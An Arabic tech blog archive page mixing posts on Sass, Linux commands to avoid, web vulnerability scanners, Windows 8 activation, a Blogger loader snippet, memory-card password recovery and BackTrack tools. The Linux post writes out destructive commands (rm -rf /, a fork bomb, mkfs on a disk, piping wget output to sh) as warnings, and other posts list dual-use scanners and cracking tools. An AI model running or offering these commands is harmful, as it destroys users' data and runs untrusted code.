إظهار الرسائل ذات التسميات أخبار تقنية. إظهار كافة الرسائل
إظهار الرسائل ذات التسميات أخبار تقنية. إظهار كافة الرسائل
مدخل إلى Sass البديل الجديد لCSS
بسم الله الرحمان الرحيم
مرحبناا بكم متابعي مدونة فريق التطوير قي درس جديد حصري و هو حول لغة البرمجة Sass حيث ان لغة CSS هي لغة برمجة تحتوي بدورها على اخطاء لهذا وجب على المطورين ابتكار حلول و لحسن الحظ اقترح منذ بضعة سنين المُطوران Hampton Catlin وNathan Weizenbaum طريقة أفضل للتعامل مع أوراق الأنماط المعقدة.
تم إطلاق اسم Sass على التركيب الجديد والذي هو اختصار لـ syntactically awesome style sheets. الإصدارات الأولى من Sass كان مُختلفة جدا عن CSS الكلاسيكي، فعلى سبيل المثال لم يكن هناك وجود لأي حاضنات curly braces، كما أنه وجب تسنين indent الخواص على نحو مُعين وبعدد مُحدد من المسافات لتجنب ظهور أخطاء لدى ترجمة الملف. لم يمنع الأمر المُبرمجين الذين اعتادوا على تعلم لغات برمجة جديدة والاستمتاع بذلك من التعامل مع هذه اللغة ولم يجدوا مُشكلا مع التراكيب الجديدة التي أتت بها Sass.، لكن الأمر كان مُختلفا مع المُصممين الذين رأوا أن البنية اللغوية لـ Sass كانت مُختلفة جدا عن الـ CSS الذي ألفوه ولذلك لم يرغبوا في استخدامه. المُشكل الآخر هو أن الاختلاف في البُنية اللغوية مع CSS الكلاسيكية جعل من مهمة الاستفادة من Sass في المشاريع الحالية أمرا مستحيلا من دون إمضاء الكثير من الوقت لترجمة ملفات CSS الحالية إلى Sass.
ولدرء هذه المشاكل عمد المُطورون في الإصدار 3.0 من Sass إلى إضافة بُنية لغوية جديدة أقرب ما تكون من بنية CSS والتي أطلقوا عليها اسم SCSS أو Sassy CSS. يوصف SCSS عادة بأنه “مُجمع صارم” Strict Superset أو لغة مُترفعة مشتقة من CSS وهو الأمر الذي يعني بأن أي ملف يُعتبر صحيح البُنية في CSS سيكون صحيح البُنية في SCSS أيضا. بعبارة أخرى يُمكنك استخدام ملفات CSS الحالية مع معالج Sass القبلي من دون أية مشاكل، مما سيسمح لك بتعلم واستخدام بعض خواص Sass دون الحاجة إلى تعلم جميع الخواص لاستخدامه.
عكس ما هو الحال مع CSS العادي فإنه يُمكن اعتبار Sass/ SCSS لغة برمجية scripting language بكل ما تحمله الكلمة من معنى، حيث أنه يدعم العديد من خواص لغات البرمجة مثل: expressions،functions، variables، conditional logic، و loops. بطبيعة الحال أنت في غنى عن استعمال كل هذه الخواص دفعة واحدة، لكنها قيد إشارتك لما تكون في حاجة إليها، بل وستجعل من مهمة كتابة أوراق أنماط مُعقدة -والتي عادة ما تحتوي على شفرات مُكررة- أمرا في غاية السهولة.ذ
هده مجرد مقدم او مدخل للغة Sass و بامكانك تعلم هده اللغة تكتسب خبر اكبر في هذا المجال و الى هنا ينتهي مقالنا الخصري و الى موضوع اخر في امان الله.
الاكواد التي لا يجب التفكير في استعمالها على انظمة اللينكس
السلام عليكم و رحمة الله تعالى و بركاته
اخواني متابعي مدونة فريق التطوير مرحباابكم في درس جديد و درسنا لهذا اليوم مستهدف لاصحاب انطمة اللينكس حيث اننا سنعرض أوامر "قاتلة" لا يجب عليك استعمالها فقد اصبح Linux نظاما سريع الانتشار و اصبح العديد من المستخدمين يتسارعون لتعلم كيفية التعامل معه و حيث ان مركز الاوامر (Terminal) الخاص بالنظام هو ابرز مميزاته فانه يلزم الحذر اثناء التعامل مع اوامره.في هذا موضوع سنتطرق الى خمسة اوامر وجب عدم تجربتها الا ان كنت مدركا لما تقوم به لانها ستعرض ملفاتك او نظام التشغيل بكامله للضرروهب كالتالي
rm -rf /
هذا الامر يقوم بحذف كل الملفات الممكنة سواء كانت على القرص الصلب او حتى على اي وحدة تخزين خارجية متصلة بالجهاز كما انه لن يظهر لك طلب تاكيد الامر.-----------------
:(){ :|: & };:
يسمى بـ Fork Bomb حيث انه عند تطبيق الامر يقوم بنسخ نفسه مرة اخرى ليصبح لديك اثنان , هذان الاثنان ينسخان نفسهما مرة اخرى وهكذا ..الى ان يستهلك موارد الجهاز و يتجمد النظام .---------------------------
mkfs.ext4 /dev/sda1
تتجلى مهمة هذا الامر في القيام بعملية Format للـ Partition الرئيسي من القرص الصلب .-------------------------------
mv ~ /dev/null
هذه ~ تمثل الـ Home folder و /dev/null في اوساط Unix هو بمثابة ثقب اسود و بالتالي فتنفيذ هذا الامر يقوم بارسال كل ملفات الـ home folder الى 'العدم' اي حذفها نهائيا. كما يمكن ان نعوض ~ باسم اي مجلد اخر و سيكون له نفس المصير.--------------------------------------------------------
wget http://some_untrusted_source -O- | sh
هذا الامر سيقوم بتحميل سكربت من المصدر الغير موثوق ويقوم بتشغيله الشيئ الذي غالبا ما يكون ضارا ,لذا يجب عدم تشغيل مثل هذا الامر من مصادر غير موثوقة.كانت هذه بعض الاوامر التي وجب التحذير من استخدامها عشوائيا و ان كنت من محبي التجربة فانصحك بتجربتها على نظام تشغيل وهمي.
أشهر 6 الادوات التي يستخدمها خبراء الحماية (الهكرز) في إختراق المواقع
بسم الله الرحمان الرحيم
اخواني متابعي مدونة فريق التطوير مرحباا بكم في درس جديد علو مدونتنا وهومتمحور حول الادوات التي يستعملها خبراء الحماية في الكشف عن الثغرات الموجودة في المواقع حيث اننا سنتطرق الى افضل 6 ادوات مشهور و هي كالتاليتطبيق Vega
تعد من اشهر ادوات إكتشاف الثغرات الامنية في المواقع والتي يستخدمها الهاكرز ، إذ انها قادرة على إكتشاف ثغرات امنية كـ (cross site scripting, file inclusion SQL injection, directory listing, shell injection,) . الاداة والمبنية على الجافا تتمع بواجهة رسومية تسهل الحياة على من يستعملها فيبقى على مستخدمها ان يقوم بتحديد فقط بعض الإعدادات حول كيف تتعامل الاداة مع الهدف ليتم بدأ عمل مسح شامل للموقع والكشف عن ثغراته الامنية .
رابط الاداة : subgraph.com/vega
-----------------
رابط الاداة : subgraph.com/vega
-----------------
تطبيق W3af
W3afيعد من أخطر الادوات ، فغير انها اداة مشهورة جدا بين خبراء الحماية والهاكرز فإنها قوية جدا ! . حيث ان الاداة قادرة على الكشف جميع انواع ثغرات (SQL injection) و ثغرات (Cross-Site Scripting) ، كما انها تأتي بواجهتين واجهة رسومية وواجهة تيرمينال .طبعا الواجهة الرسومية سهلة جدا ولن يجد من يستعملها اي مشاكل في التشغيل ، حيث يبقى كما هو الامر بالنسبة لاداة Vega القيام فقط بتحديد بعض الاختيارات تم الإنطلاق !
رابط الاداة : http://w3af.org/
--------------------
تطبيق SQLMap
SQLMapومن لايعرفه ! إسكيول ماب معروف بقوته وجبروته فيما يخص إكتشاف جميع انواع ثغرات الاسكيول إنجكشن فهو يعمل على أتمتة عملية البحث عن ثغرات الاسكيول في تطبيقات الويب ، كما ان الاداة تدعم معضم قواعد البيانات المشهورة والتي تعتمدها العديد من المواقع مثل (MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB) .
رابط الاداة : https://github.com/sqlmapproject/sqlmap
----------
تطبيق Wfuzz
آه ! Wfuzz هذا الاخير مختص في إختبار دالة ال (POST) و الـ (GET) من اجل الكشف عن بعض الثغرات في (SQL, XSS, LDAP) كما انه يمكنك إستخدامه في كشف ثغرات الالبروكسي ، نظام التحقق (Authentication ) و كذلك يمكن إستخدامه في عمل كوكيز فوزينغ cookies fuzzing .للإشارة في إن تطبيق Wfuzz لايتوفر على واجهة رسومية لهذا فإن تشغيله سيكون عن طريق كتابة مجموعة من الاوامر في التيرمينال .رابط الاداة : http://code.google.com/p/wfuzz
---------
تطبيق Grendel-Scan
اداة ستجد لها العديد من الشروحات في الويب ، فهي تقوم باتمتة عملية الكشف عن الثغرات الامنية في المواقع ، حيث يمكنها الكشف عن معضم الثغرات المعروفة ، كما انها تدعم جميع أنظمة التشغيل كويندوز لينكس وماكرابط الاداة:http://sourceforge.net/projects/grendel
----------
تطبيق Arachni
اداة Arachni هي اداة تقوم بالكشف عن معضم ثغرات الويب في الموقع الهدف ، من اهمها ثغرات (Local File inclusion) و ثغرات (remote file inclusion) المعروفة بخطورتها . الاداة تعمل فقط على الماك و لينكس كما انها عبارة عن فيرموورك متكامل يمكن تحميله من الرابط اسفله .
رابط الاداة: http://www.arachni-scanner.com
رابط الاداة: http://www.arachni-scanner.com
كانت هذه اهم الادوات المستعملة من طرف خبراء الحماية و الهكرز في حماية المواقع او اختراقها .
الطريقة الصحيحة و السليمة لتفعيل الويندوز 8
السلام عليكم و رحمة الله تعالى و بركاتة
-------------------------------------------
اخواني في الله معكم معاذ بولهدود في شرح جديد على مدونة فريق التطوير و بعد درس تحميل Windows 8.1 و Windows7 النسخه الأصلــيه من مايكروسوفت وبالنواتين ياْتي دور التفعيل وهو اهم شئ اذن فشرحنا لهذا اليوم هو عن طريقة تفعيل Windows 8 و بالطريقة الصحيحية لذلك
-------------------------------------------
اخواني في الله معكم معاذ بولهدود في شرح جديد على مدونة فريق التطوير و بعد درس تحميل Windows 8.1 و Windows7 النسخه الأصلــيه من مايكروسوفت وبالنواتين ياْتي دور التفعيل وهو اهم شئ اذن فشرحنا لهذا اليوم هو عن طريقة تفعيل Windows 8 و بالطريقة الصحيحية لذلك
ولكن قبل دعونا نعرف لماذا يجب تفعيل الويندوز
حاول الذهاب الى القائمة الجانبية ومنها الىParamétres بعدها في الاسفل الى modifier les paramétres du PC ستفتح لك نافدة جديد في الاعلى ستجد خيار تعديل الصورتك الشخصية Avatar du compte للاسف فاِن خيار تغيير الصورة معطل ويجب عليك التفعيل ليس هذا فقط فتغيير شكل صفحة البداية يحاج ال تفعيل الويندوز
و الان اترككم مع الشرح بالفيديو
--فرجة ممتعة--
لتحميل الادات المستعملة في الشرح
اضافة جاري تحميل المدونة لمدونات بلوجر
السلام عليكم إخواني أخواتي الأعزاء مرة أخرى ومع إضافة جديدة وحصرية يسعدني أن أقدمها لكم ، الإضافة عبارة عن أشكال
لتحميل الصفحة أو بالأحرى تحميل الموقع بكامله مع طريقة التركيب طبعا ، 50% من المواقع والمدونات تستخدمها وهناك
أسباب
أسباب
وعوامل لإستخدامها إذا كان الموقع بنفسه ثقيل التحميل لما يشمله من إضافات أو سرعة الأنترنيت ضعيفة أو لإضافة رونق جميل
للموقع في كلا الحالتين هناك سبب وجيه وهو تحفيز الزائر على أن لا يترك الموقع فهناك تأثيرات عديدة تم إبداعها لترك الزائر
يركز عليها بينما تحمل الصفحة وفي نفس الوقت طريفة وهذا مثال يوضح المعنى من هنا .. جميلة أليست كذلك الأن لديك فكرة
عما سأقدمه في الإضافة إلى أنا إضافتنا ليست بالشكل المماثل على أي حال هناك العديد لتختار بينهم ولهذا سنمر لشرح
في المعاينة يمكنك التجربة بالضغط على مواضيع ريتما تحمل الصفحة وسيظهر لك المثال ، قد لا تلاحظ الشكل إذا كانت لديك
سرعة الأنترنت سريعة
______________________________________________________
الأشكال - النسخة الثانية -

شرح طريقة التركيب
1 . نتوجه لقالب >> تحرير
2. ابحث بإستعمال CTRL+F عن : <head/>
3. ضع الكود التالي قبله [ فوقه]
<style type='text/css'>/* CSS Loading Page */
#page-loader {position:fixed!important;position:absolute;top:0;left:0;bottom:0;
right:0;z-index:9999;background:#fff url('http://2.bp.blogspot.com/-t2gSISF0Sdc/U4XzAzFl5qI/AAAAAAAADVY/nYmOzAOnbus/s1600/Loader3.gif') no-repeat 50% 50%;color:#fcfcfc;padding:1em 1.2em;display:none;}</style>
4. ابحث عن : <body/>
5. ضع الكود التالي قبله [ فوقه]
<script type='text/javascript'>
//<![CDATA[
$(document.body).append('<div id="page-loader">Loading...</div>');
$(window).on("beforeunload", function() {
$('#page-loader').fadeIn(1000).delay(9000).fadeOut(1000);
});
//]]>
</script>
* إنتهينا من الأكواد الأساسية .. لتغيير الشكل غير الصورة بالكود الأول
http://1.bp.blogspot.com/-P-5FnimXxqA/U12jaq9zy5I/AAAAAAAACfI/7xRWD-dq6ns/s1600/loading.gif
* من الأشكال التي قمت بتحميلها إرفع صورة الشكل الذي يناسبك وضعها بدل الصورة السابقة
كيف تكشف كلمة سر الكارد ميموري عند ضياعها
السلام عليكم و رحمة الله تعالى
-----------------------------------------------------------
اخواني ماتابعي مدونة المكتشف و بعد غياب طويل لاسباب خارجة عن صيطرتي اُتي لكم بموضوع حصري عن طريقة كشف كلمة السر الخاص ببطاقة الذاكرة (Memory card) بكارت ميموري أذا كنت قد أضعتهــا:
1- قم بتحميل البرنامج التالي
-----------------------------------------------------------
اخواني ماتابعي مدونة المكتشف و بعد غياب طويل لاسباب خارجة عن صيطرتي اُتي لكم بموضوع حصري عن طريقة كشف كلمة السر الخاص ببطاقة الذاكرة (Memory card) بكارت ميموري أذا كنت قد أضعتهــا:
1- قم بتحميل البرنامج التالي
:
http://gallery.mobile9.com/f/1399063/?ifr=1
2- قم بتثبيته في ذاكرة الهاتف
3- بعد الدخول توجه الى (C) ستجد ملف أسمه (MMSDTOR)
4- بعد ذلك قم بآرساله عبر البلوتوث الى الحاسوب وقم بفتحه بواسطة (Bloc-notes) وستجد به كلمة السر التي كنت قد وضعتها
طريقة كشف كلمة السر الخاص بـ كرط ميموري أذ=ا كنت قد أضعتهــا:
1- قم بتحميل البرنامج التالي :
http://freedownloadshare.com/archive/dl.php?id=rtKXYRMo&dir=file&name=fexplorer.jar
2- قم بتثبيته في ذاكرة الهاتف
3- بعد الدخول توجه الى (C) ستجد ملف أسمه (MMSDTOR)
4- بعد ذلك قم بآرساله عبر البلوتوث الى الحاسوب وقم بفتحه بواسطة (Bloc-notes) وستجد به كلمة السر التي كنت قد وضعتها
http://gallery.mobile9.com/f/1399063/?ifr=1
2- قم بتثبيته في ذاكرة الهاتف
3- بعد الدخول توجه الى (C) ستجد ملف أسمه (MMSDTOR)
4- بعد ذلك قم بآرساله عبر البلوتوث الى الحاسوب وقم بفتحه بواسطة (Bloc-notes) وستجد به كلمة السر التي كنت قد وضعتها
طريقة كشف كلمة السر الخاص بـ كرط ميموري أذ=ا كنت قد أضعتهــا:
1- قم بتحميل البرنامج التالي :
http://freedownloadshare.com/archive/dl.php?id=rtKXYRMo&dir=file&name=fexplorer.jar
2- قم بتثبيته في ذاكرة الهاتف
3- بعد الدخول توجه الى (C) ستجد ملف أسمه (MMSDTOR)
4- بعد ذلك قم بآرساله عبر البلوتوث الى الحاسوب وقم بفتحه بواسطة (Bloc-notes) وستجد به كلمة السر التي كنت قد وضعتها
الطريقة صعب قليلا و لكمها تستحق العناء
و الى موضوع اخر انشاء الله
تجربة جميع أنظمة الويندوز والماك القديمة أون لاين على النت
السلام عليكم ورحمة الله وبركاته
------------------------------
------------------------------
أحببت أن أقدم لكم موقع virtualdesktop في هاته التدوينة الذي يمكنك من تجربة بعض الأنظمة القديمة للوندوز أو الماك محاكيات لسطح المكتب الخاص بهذه الأنظمة التي قد لم تعش أيامها و زمنها .
--------------------------------------------------
--------------------------------------------------
حيث يتوفر على محاكيات للوندوز 95 بإصداراته ونفس الأمر بالنسبة للوندوز 98 مرورا بالوندوز 2000 و ال xp ، بالإضافة إلى بعض نسخ الماك القديمة ، كل هذا بزيارة الموقع والضغط على أي نظام تود تجربته.
--------------------------------------------------
--------------------------------------------------
لن أطيل عليكم أدعوكم تكتشفون الموقع :الموقع من هنا
---------------------------------
بعض الصور
ما هو نظام الباك تراك
ما هو الباكتراك؟ What is backTrack?
الباكتراك : هو إصدار من إصدارات اللينوكس مفتوحة المصدر ,, يمكن تشغيلها من خلال الهارديسك ، أو من خلال دي في دي ، أو من خلال فلاش ميموري(USB)، وتهدف هذه الإصدارة بشكل خاص لاختبار الأمان من الاختراقات، وتحتوي عالكثير من الأدوات الخاصة، وتم بناء هذه الإصدارة استناداً على نظام اليوبنتو الشهير.
تاريخ الباك تراك BackTrack History
نشأت هذه الإصدارة من خلال اندماج اصدارين من إصدارات اللينوكس السابقة المتنافسة فيما بينها والتي كانت ترتكز على اختبار الاختراق.
slax وهي طريقة الإقلاع وتشغيل نظام التشغيل من خلال Live CD بمعنى ضع السي دي وقم باعادة التشغيل سيتم تشغيل النظام من خلاله. وقد قام بتطوير هذا النظام Mati Aharoni وهو مستشار بالأمن الإسرائيلي.
ويمكن استخدام فلاش ميموري بدلاً من السي دي أو الدي في دي.
وقد ساهم في هذا التطوير Max Moser حيث شملت التوزيعة أكثر من 300 أداة مرتبة بترتيب هرمي.
وما زال التطوير مستمر من عدة مطورين.
أدوات الباكتراك BackTrack Tools
تقدم توزيعة الباكتراك العديد من الأدوات وتمكن المستخدم من سهولة الوصول إليها ابتداءاً من البحث عن المنافذ كسر كلمات المرور والحصول عليها "الحصول على كلمات المرور الأصلية". وكما ذكرنا أدوات لتشغيل النظام من خلال دي في دي أو فلاش ميموري مع أمكانية تثبيت النظام على الهارد ديسك الخاص بجهاز الكمبيوتر.
ومن ضمن هذه الأدوات:
Metasploit integration
RFMON Injection capable wireless drivers
Kismet
Nmap
Ophcrack
Ettercap
Wireshark (formerly known as Ethereal)
BeEF (Browser Exploitation Framework)
Hydra
Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with telnet/enable default password.
Quypt (Terminal Emulator) (which is private software by Crimson Hacking group, which has leaked to the Mainstream) Blackhat
A large collection of exploits as well as more commonplace software such as browsers.
BackTrack arranges tools into 11 categories:
Information Gathering
Network Mapping
Vulnerability Identification
Web Application Analysis
Radio Network Analysis (802.11, Bluetooth, RFID)
Penetration (Exploit & Social Engineering Toolkit)
Privilege Escalation
Maintaining Access
Digital Forensics
Reverse Engineering
Voice Over IPاصدارات الباكتراك BackTrack Releases
BackTrack v.1.0 Beta February 5
, 2006 The BackTrack project released its first non-beta version (1.0) May 26, BackTrack 2 final released. March 6, 2007 BackTrack 3 final released. June 19, 2008 BackTrack 4 final release. (Now based on Debian) January 9
, 2010 BackTrack 4 R1 release May 8, 2010
BackTrack 4 R2 release November 22,
2010 BackTrack 5 release May 10, 2011
المصدر عالم الحواسيب
الباكتراك : هو إصدار من إصدارات اللينوكس مفتوحة المصدر ,, يمكن تشغيلها من خلال الهارديسك ، أو من خلال دي في دي ، أو من خلال فلاش ميموري(USB)، وتهدف هذه الإصدارة بشكل خاص لاختبار الأمان من الاختراقات، وتحتوي عالكثير من الأدوات الخاصة، وتم بناء هذه الإصدارة استناداً على نظام اليوبنتو الشهير.
نشأت هذه الإصدارة من خلال اندماج اصدارين من إصدارات اللينوكس السابقة المتنافسة فيما بينها والتي كانت ترتكز على اختبار الاختراق.
slax وهي طريقة الإقلاع وتشغيل نظام التشغيل من خلال Live CD بمعنى ضع السي دي وقم باعادة التشغيل سيتم تشغيل النظام من خلاله. وقد قام بتطوير هذا النظام Mati Aharoni وهو مستشار بالأمن الإسرائيلي.
ويمكن استخدام فلاش ميموري بدلاً من السي دي أو الدي في دي.
وقد ساهم في هذا التطوير Max Moser حيث شملت التوزيعة أكثر من 300 أداة مرتبة بترتيب هرمي.
وما زال التطوير مستمر من عدة مطورين.
أدوات الباكتراك BackTrack Tools
تقدم توزيعة الباكتراك العديد من الأدوات وتمكن المستخدم من سهولة الوصول إليها ابتداءاً من البحث عن المنافذ كسر كلمات المرور والحصول عليها "الحصول على كلمات المرور الأصلية". وكما ذكرنا أدوات لتشغيل النظام من خلال دي في دي أو فلاش ميموري مع أمكانية تثبيت النظام على الهارد ديسك الخاص بجهاز الكمبيوتر.
ومن ضمن هذه الأدوات:
Metasploit integration
RFMON Injection capable wireless drivers
Kismet
Nmap
Ophcrack
Ettercap
Wireshark (formerly known as Ethereal)
BeEF (Browser Exploitation Framework)
Hydra
Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with telnet/enable default password.
Quypt (Terminal Emulator) (which is private software by Crimson Hacking group, which has leaked to the Mainstream) Blackhat
A large collection of exploits as well as more commonplace software such as browsers.
BackTrack arranges tools into 11 categories:
Information Gathering
Network Mapping
Vulnerability Identification
Web Application Analysis
Radio Network Analysis (802.11, Bluetooth, RFID)
Penetration (Exploit & Social Engineering Toolkit)
Privilege Escalation
Maintaining Access
Digital Forensics
Reverse Engineering
Voice Over IPاصدارات الباكتراك BackTrack Releases
BackTrack v.1.0 Beta February 5
, 2006 The BackTrack project released its first non-beta version (1.0) May 26, BackTrack 2 final released. March 6, 2007 BackTrack 3 final released. June 19, 2008 BackTrack 4 final release. (Now based on Debian) January 9
, 2010 BackTrack 4 R1 release May 8, 2010
BackTrack 4 R2 release November 22,
2010 BackTrack 5 release May 10, 2011
المصدر عالم الحواسيب
تكنولوجيا العصر مع ماوس Intelligent Design Titanium الأنيق
اسلام عليكم
تعرف الأن علي احدث تكنولوجيا العصر مع ماوس Intelligent Design Titanium الأنيق فعلى الرغم من إن اسمه قد يكون مربكاً بعض الشيء، ولكنه حقاً مصمم بطريقة ذكية وفريدة من نوعها، وستشعر عند تجربته أنك تستعمل جهاز فضائي وليس مجرد ماوس عادي. ماوس Intelligent Design Titanium مصمم من مادة التيتانيوم عالية الجودة، جنباً إلى جنب مع الاستعانة ببعض المواد البلاستيكية، ويتميز بتضمنه لمغناطيس النيوديميوم، وعجلة التنقل، وتقنية البلوتوث، بالإضافة إلى التتبع الدقيق لليزر والسرعة في تنفيذ الأوامر.
تعرف الأن علي احدث تكنولوجيا العصر مع ماوس Intelligent Design Titanium الأنيق فعلى الرغم من إن اسمه قد يكون مربكاً بعض الشيء، ولكنه حقاً مصمم بطريقة ذكية وفريدة من نوعها، وستشعر عند تجربته أنك تستعمل جهاز فضائي وليس مجرد ماوس عادي. ماوس Intelligent Design Titanium مصمم من مادة التيتانيوم عالية الجودة، جنباً إلى جنب مع الاستعانة ببعض المواد البلاستيكية، ويتميز بتضمنه لمغناطيس النيوديميوم، وعجلة التنقل، وتقنية البلوتوث، بالإضافة إلى التتبع الدقيق لليزر والسرعة في تنفيذ الأوامر.البلوتوث …ماهو البلوتوث حقيقته
السلام عليكم
البلوتوث هي تكنولوجيا جديدة متطورة تمكن من توصيل الأجهزة الالكترونية مثل الكمبيوتر والتلفون المحمول ولوحة المفاتيح وسماعات الرأس من تبادل البيانات والمعلومات من غير أسلاك أو كوابل أو تدخل من المستخدم. , وقد انضمت أكثر من 1000 شركة عالمية لمجموعة الاهتمام الخاص بالبلوتوث Bluetooth Special Interest Group وهي ما تعرف اختصارا بـ SIG وذلك لتحل هذه التكنولوجيا محل التوصيل بالأسلاك .
حقيقة التسمية بهذا الاسم
تمت تسمية التقنية ببلوتوث على اسم موحد الدنمارك والنرويج صاحب الناب الأزرق وهو الملك ( هارولد بلوتوث ) Harald Bluetooth المتوفى عام 986م . الذي يعتبر أول من أدخل النصرانية إلى شمال أوروبا . فأغلب الشركات المؤسسة لتقنية البلوتوث هي من الدول الاسكندنافية فنوكيا من فنلندا ، وأر يكسون من السويد بالرغم من أن التسمية لا علاقة لها بمضمون التكنولوجيا..وعلى هذا هم يعلنون احترامهم للملك الذي وحد جزءاً من اسكندنافيا . معاذ
6 خدع لجوجل رائعة ربما لم ترها من قبل
السلام عليكم
الكثير من الناس يستعملون محرك البحث جوجل لكن القليل منهم يعرفون هذه الخدع من جوجل التي سنراها في هذا الموضوع .
1- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “ tilt ” واضغط Entrer
2- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “ do a barrel roll ” واضغط Entrer.
3- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “ zerg rush ” واضغط Entrer.
4- قم بالدخول لمحرك البحث Google واكتب العبارة التالية“ Google Gravity”واضغط ضربة حظ او J'ai de la chance.
5- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “ Google Mirror ” واضغط ضربة حظ او J'ai de la chance.
6- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “Google Terminal” واضغط ضربة حظ او J'ai de la chance.
mou@d
أعلن هنا







.jpg)

